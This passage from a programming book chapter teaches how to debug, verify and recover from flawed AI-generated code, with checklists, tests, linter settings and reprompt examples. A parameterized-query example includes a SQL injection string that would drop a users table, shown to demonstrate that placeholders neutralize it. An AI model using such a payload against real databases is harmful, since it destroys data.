While AI does not flag its own uncertainty, there are signals you can watch for:

Overly specific details on obscure topics. If the AI provides very detailed configuration for a niche library or platform, verify every option. AI is most likely to hallucinate when the topic has limited representation in training data.

Inconsistency within the same response. If the AI uses one approach in one function and a contradictory approach in another, at least one is wrong.

Suspiciously convenient solutions. If a complex problem is solved with a single function call to an API you have never heard of, verify that the API exists.

Solutions that avoid the hard part. If the AI's solution to a complex problem seems too simple, it may have glossed over essential complexity (error handling, edge cases, concurrency control).

Code that matches common but wrong patterns. Patterns that appear frequently in tutorials and Stack Overflow answers (like using MD5 for passwords or string formatting for SQL) are exactly what AI reproduces most confidently.

Intuition: Develop a "that's too easy" instinct. When a genuinely hard problem gets a clean, short solution from the AI, that is your signal to verify extra carefully. Hard problems usually require hard solutions, and if the code seems too neat, important complexity may be missing.


14.8 Debugging AI-Generated Code Systematically

Debugging AI-generated code requires a different approach than debugging code you wrote yourself. You did not write it, so you lack the mental model of how it is supposed to work. You need to build that mental model before you can find the bugs.

The VERIFY Framework

Use this systematic framework when reviewing AI-generated code:

V — Validate imports. Check that every imported module and name actually exists. Run the imports in a REPL.

E — Examine edge cases. Test with empty inputs, single elements, maximum values, None/null values, and negative numbers.

R — Review security. Check for SQL injection, XSS, hardcoded secrets, path traversal, insecure deserialization, and weak cryptography.

I — Inspect logic. Trace through the code mentally with concrete values. Pay special attention to loop bounds, comparison operators (< vs <=, > vs >=), and return values.

F — Find performance issues. Look for nested loops, queries inside loops, unnecessary copying, and blocking operations in async code.

Y — Yell about types. Check that types match expectations throughout the data flow. A function that receives a string when it expects an integer may fail at runtime or, worse, silently produce wrong results.
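The V step can be partially automated. A minimal sketch using the standard library (the module names checked are illustrative):

```python
import importlib.util

def find_missing_modules(module_names: list[str]) -> list[str]:
    """Return the top-level module names that cannot be imported.

    Note: this check is reliable only for top-level names; a dotted
    path whose parent is missing raises ModuleNotFoundError instead.
    """
    return [m for m in module_names if importlib.util.find_spec(m) is None]

# 'json' is real; the second name is a deliberately fake example
missing = find_missing_modules(["json", "definitely_not_a_real_module"])
```

Running a check like this over every import in an AI-generated file takes seconds and catches hallucinated packages before you waste time debugging anything else.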

Practical Debugging Techniques

Add assertion statements. Before and after AI-generated code blocks, add assertions that verify your expectations:

def process_orders(orders: list[dict]) -> list[dict]:
    assert all(isinstance(o, dict) for o in orders), "All orders must be dicts"
    assert all('id' in o for o in orders), "All orders must have 'id'"

    result = ai_generated_processing_logic(orders)

    assert len(result) <= len(orders), "Should not create more orders than input"
    assert all('total' in r for r in result), "All results must have 'total'"
    return result

Use print debugging strategically. When you cannot understand what AI-generated code is doing, add print statements at key points:

def mystery_function(data):
    print(f"Input: {data[:3]}... (length={len(data)})")  # Sample first 3

    intermediate = step_one(data)
    print(f"After step_one: {type(intermediate)}, length={len(intermediate)}")

    result = step_two(intermediate)
    print(f"After step_two: {type(result)}, first_item={result[0] if result else 'EMPTY'}")

    return result

Write targeted test cases. Create tests that specifically probe the areas where AI is likely to fail:

def test_pagination_edge_cases():
    """Test AI-generated pagination with tricky inputs."""
    items = list(range(10))

    # Normal case
    assert get_page(items, 0, 3) == [0, 1, 2]
    assert get_page(items, 1, 3) == [3, 4, 5]

    # Edge cases AI often gets wrong
    assert get_page(items, 3, 3) == [9]      # Last partial page
    assert get_page(items, 4, 3) == []        # Beyond last page
    assert get_page([], 0, 3) == []            # Empty list
    assert get_page(items, 0, 100) == items    # Page size > list size
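For reference, one implementation that satisfies all of these cases (a sketch; it leans on Python slicing, which clamps out-of-range indices instead of raising):

```python
def get_page(items: list, page: int, page_size: int) -> list:
    """Return the 0-indexed `page` of `items`, `page_size` items per page."""
    if page < 0 or page_size <= 0:
        return []
    start = page * page_size
    return items[start:start + page_size]

items = list(range(10))
```

Slicing past the end of a list yields a shortened or empty list rather than an IndexError, which is what makes the boundary cases fall out naturally.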

Use a debugger. For complex AI-generated code, step through it in a debugger rather than trying to understand it by reading alone:

# Add this line before the suspicious code
import pdb; pdb.set_trace()

# Or, on Python 3.7+, simply:
breakpoint()

Or use VS Code's built-in debugger with breakpoints.

Best Practice: When debugging AI-generated code, resist the urge to fix the code before you understand it. First build a complete mental model of what the code does (right and wrong). Then fix it. If you patch symptoms without understanding, you will introduce new bugs.

Type Checking as a Debugging Tool

Static type checking catches many AI errors before runtime:

# Install mypy: pip install mypy
# Run: mypy your_file.py

AI-generated code often has type inconsistencies that mypy catches:

def get_user_age(user: dict[str, int]) -> int:
    return user.get('age')  # mypy error: got "Optional[int]", expected "int"
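A mypy-clean rewrite forces the missing-key case into the open, which is exactly the kind of decision AI-generated code tends to skip (a sketch):

```python
def get_user_age(user: dict[str, int]) -> int:
    # .get returns int | None; handle the None branch explicitly
    age = user.get('age')
    if age is None:
        raise KeyError("user record is missing 'age'")
    return age
```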

Using Linters Effectively

Configure your linter to catch common AI mistakes:

# .flake8 configuration
[flake8]
max-complexity = 10
select = E,W,F,C90

Tools like pylint, ruff, and flake8 catch issues that are invisible to the eye but obvious to static analysis.


14.9 Recovery Strategies and Conversation Repair

Sometimes an AI conversation goes so far off track that individual bug fixes are not enough. You need strategies for recovering the conversation — getting the AI back on a productive path.

Recognizing a Derailed Conversation

Signs that your AI conversation has gone off the rails:

  • Circular fixes: You report a bug, the AI "fixes" it but introduces a new bug, you report that, and the cycle repeats.
  • Contradictory approaches: The AI switches between fundamentally different architectural approaches across responses.
  • Increasing complexity: Each "fix" makes the code more complex rather than simpler.
  • Losing context: The AI forgets constraints or requirements you specified earlier.
  • Cargo cult fixes: The AI makes changes that look relevant but do not actually address the problem.

The Nuclear Option: Start Fresh

Sometimes the best recovery strategy is to start a new conversation. This is especially appropriate when:

  • The context window is heavily polluted with failed attempts
  • The AI has adopted a fundamentally wrong architecture
  • More than three rounds of fixes have failed to resolve the issue

When starting fresh, include in your new prompt:

  1. A clear description of what you are building
  2. The specific constraints and requirements
  3. What approach you tried before and why it failed
  4. The specific behavior you need

I'm building a pagination function for a REST API. My previous
attempt had off-by-one errors in the page boundaries.

Requirements:
- Pages are 0-indexed (first page is page 0)
- page_size items per page
- Last page may have fewer than page_size items
- Requesting beyond the last page returns empty list
- Empty input returns empty list for any page

Please generate the function with comprehensive edge case handling.

The Targeted Reprompt

Instead of starting completely fresh, you can give the AI a very targeted correction:

Stop. The current approach of building the SQL query with string
concatenation is fundamentally insecure. Let's start the database
layer over using parameterized queries only. Do not use f-strings
or string formatting for any SQL query. Use placeholders (%s for
MySQL, ? for SQLite, $1 for PostgreSQL) in every query.

Key elements of an effective targeted reprompt:

  • Clear stop signal: "Stop" or "Let's start over on this part"
  • Identification of the fundamental problem: not just the symptom, but the root cause
  • Explicit constraint: what the new approach must do differently
  • Specific enough to prevent repetition: do not leave room for the AI to drift back to the old pattern
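To make the reprompt's constraint concrete, here is the parameterized style in sqlite3 (the table and data are illustrative, not from any project in this book):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (?, ?)", (1, "alice"))

# The user-supplied value is passed as a parameter, never spliced
# into the SQL string, so injection payloads arrive as inert data.
payload = "alice'; DROP TABLE users; --"
rows = conn.execute("SELECT id FROM users WHERE name = ?", (payload,)).fetchall()
```

The query returns no rows (no user has that literal name) and the table survives intact, because the payload was never interpreted as SQL.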

The Incremental Rollback

If the AI's code was mostly correct before a recent "fix" broke it, roll back to the last known good state:

The code was working correctly before the last change. Let's go
back to the version that used a simple for loop instead of the
recursive approach. Here is the working version:

[paste the working code]

Now, starting from this working version, let's fix ONLY the issue
where it doesn't handle empty lists. Do not change anything else.

The Constraint Fence

When the AI keeps making the same type of mistake, add explicit constraints:

Generate the data processing function with these constraints:
1. NO nested loops (time complexity must be O(n) or O(n log n))
2. NO string concatenation for building queries
3. ALL database calls must use parameterized queries
4. EVERY function must handle empty input gracefully
5. NO global state or module-level variables

Violating any of these constraints means the code is wrong.
Please check each constraint before finalizing.
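Constraint 1 in action: the difference between the pattern being fenced out and its replacement (a generic sketch, not tied to any specific project):

```python
# Fenced out: nested-loop membership test, O(n * m)
def common_items_slow(a: list, b: list) -> list:
    return [x for x in a if x in b]  # 'in' on a list rescans b each time

# Allowed: precompute a set, O(n + m)
def common_items_fast(a: list, b: list) -> list:
    b_set = set(b)  # O(1) membership checks
    return [x for x in a if x in b_set]
```

Both functions return the same result; only the fast one passes the constraint fence, which is why stating constraints in complexity terms works better than saying "make it faster."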

Real-World Application: Experienced vibe coders report that the most productive conversations follow a pattern: start with a clear specification (Chapter 10), generate code, review carefully (Chapter 7), and if problems are found, use targeted reprompts rather than trying to fix everything incrementally. The "three strikes" rule is common: if three rounds of fixes do not resolve the issue, start a fresh conversation.

Saving Good Code Before Experimenting

Before asking the AI to make significant changes to working code, save the current version:

# Save to a file, copy to clipboard, or commit to git
git add . && git commit -m "Working version before AI refactor attempt"

This gives you a rollback point if the AI's changes make things worse. Version control is your best friend when doing iterative AI-assisted development (see Chapter 31 for detailed version control workflows).


14.10 Building Resilience: The Trust-but-Verify Mindset

The final and most important lesson of this chapter is attitudinal. The developers who are most effective with AI coding assistants share a common mindset: they trust the AI enough to use it extensively, but they verify its output rigorously.

The Trust Spectrum

Developers typically fall somewhere on this spectrum:

Blind trust (dangerous): Accepts all AI output without review. Copies code directly into production. Does not test edge cases. This developer will eventually have a serious incident.

Healthy skepticism (ideal): Uses AI extensively to accelerate development. Reviews every piece of generated code. Tests edge cases and security. Verifies imports and APIs. Treats AI output as a strong first draft that needs review.

Excessive distrust (unproductive): Second-guesses everything. Rewrites most AI output from scratch. Spends more time verifying than the code would take to write manually. Loses the productivity benefits of AI assistance.

The goal is to land in the middle — healthy skepticism. Use AI freely and confidently, but build verification into your workflow as a non-negotiable step.

The Verification Checklist

Build a personal verification checklist and use it consistently. Here is a starter template:

## AI Code Verification Checklist

### Imports and Dependencies
- [ ] All imports resolve to real modules
- [ ] Library versions are compatible
- [ ] No unnecessary dependencies added

### Logic
- [ ] Works with empty input
- [ ] Works with single-element input
- [ ] Works with maximum/boundary values
- [ ] Loop bounds are correct (no off-by-one)
- [ ] Comparison operators are correct (<= vs <)

### Security
- [ ] No SQL injection (all queries parameterized)
- [ ] No XSS (all user input escaped)
- [ ] No hardcoded secrets
- [ ] No path traversal vulnerabilities
- [ ] No insecure deserialization

### Performance
- [ ] No N+1 query patterns
- [ ] No quadratic algorithms on large inputs
- [ ] No blocking I/O in async code
- [ ] No unnecessary data copying

### Style and Maintenance
- [ ] Code matches project conventions
- [ ] No deprecated APIs or patterns
- [ ] Error messages are helpful
- [ ] Type hints are accurate

Automated Verification

Automate as much of the verification as possible. Set up your project with:

  1. Type checking (mypy or pyright) to catch type errors
  2. Linting (ruff, flake8, or pylint) to catch style and logic issues
  3. Security scanning (bandit) to catch common vulnerabilities
  4. Import checking to verify all imports resolve
  5. Tests (especially edge case tests) to catch logic errors
  6. Pre-commit hooks to run all of the above before every commit

# .pre-commit-config.yaml
repos:
  - repo: https://github.com/astral-sh/ruff-pre-commit
    rev: v0.4.0
    hooks:
      - id: ruff
        args: [--fix]
      - id: ruff-format
  - repo: https://github.com/pre-commit/mirrors-mypy
    rev: v1.9.0
    hooks:
      - id: mypy
  - repo: https://github.com/PyCQA/bandit
    rev: 1.7.8
    hooks:
      - id: bandit
        args: ['-r', '--severity-level', 'medium']

Best Practice: The most effective AI verification is layered. No single tool catches everything, but combining type checking, linting, security scanning, and targeted testing creates a safety net that catches most AI-generated issues before they reach production.

When to Trust AI More

AI output is more reliable when:

  • The task is well-defined and common (CRUD operations, standard algorithms, common patterns)
  • The prompt includes clear constraints and examples
  • You are working with popular, well-documented libraries
  • The generated code is short and focused
  • You can easily test the output

When to Trust AI Less

AI output requires extra scrutiny when:

  • The task involves security-critical logic
  • The problem is novel or domain-specific
  • The code interacts with external systems or APIs
  • The prompt is ambiguous or underspecified
  • The generated code is long and complex
  • The task involves concurrency or distributed systems
  • You are working with niche libraries or recent API changes

Building Organizational Resilience

For teams using AI coding assistants, consider:

  • Code review remains essential. AI-generated code should go through the same review process as human-written code. Reviewers should be trained to watch for AI-specific failure patterns.
  • Track AI-generated incidents. Keep a log of bugs that originated from AI-generated code. Look for patterns — this tells you where your verification process has gaps.
  • Share knowledge. When someone on the team discovers a new AI failure pattern, share it with everyone. Build a team-specific "AI gotchas" document.
  • Update prompts. If a particular type of error keeps recurring, update your prompt templates to explicitly guard against it.

Real-World Application: Companies that successfully adopt AI coding at scale report that their bug rates initially increase as developers learn to use AI tools, then decrease below pre-AI levels as developers internalize the trust-but-verify mindset and build automated verification pipelines. The transition period typically takes 2-3 months.


Chapter Summary

AI coding assistants are powerful tools that make mistakes. The key to using them effectively is not to avoid mistakes — that is impossible — but to catch them quickly and systematically.

We covered:

  • Hallucinated APIs: AI invents functions, classes, and entire libraries. Verify imports immediately.
  • Logic errors: Off-by-one, boundary conditions, race conditions, and incorrect algorithms. Test edge cases rigorously.
  • Security vulnerabilities: SQL injection, XSS, hardcoded secrets, path traversal, insecure deserialization, weak crypto. Cross-reference against OWASP.
  • Performance anti-patterns: N+1 queries, quadratic algorithms, blocking I/O, unnecessary copying. Review time complexity.
  • Outdated patterns: Python 2 remnants, deprecated APIs, old framework patterns. Check current documentation.
  • The confidence problem: AI never says "I don't know." Watch for signals and develop your "that's too easy" instinct.
  • Systematic debugging: Use the VERIFY framework — Validate imports, Examine edge cases, Review security, Inspect logic, Find performance issues, Yell about types.
  • Recovery strategies: Start fresh, targeted reprompt, incremental rollback, constraint fencing. Know when to abandon a conversation.
  • Trust-but-verify: Use AI freely but verify rigorously. Automate verification with type checking, linting, security scanning, and tests.

The developers who are most effective with AI are not those who never encounter bugs — they are those who have systems for catching bugs before their users do. Build those systems, internalize the trust-but-verify mindset, and AI-generated code will be a massive accelerator rather than a liability.


Next chapter: Chapter 15: CLI Tools and Scripts — We move into Part III and start building real software, beginning with command-line tools and automation scripts.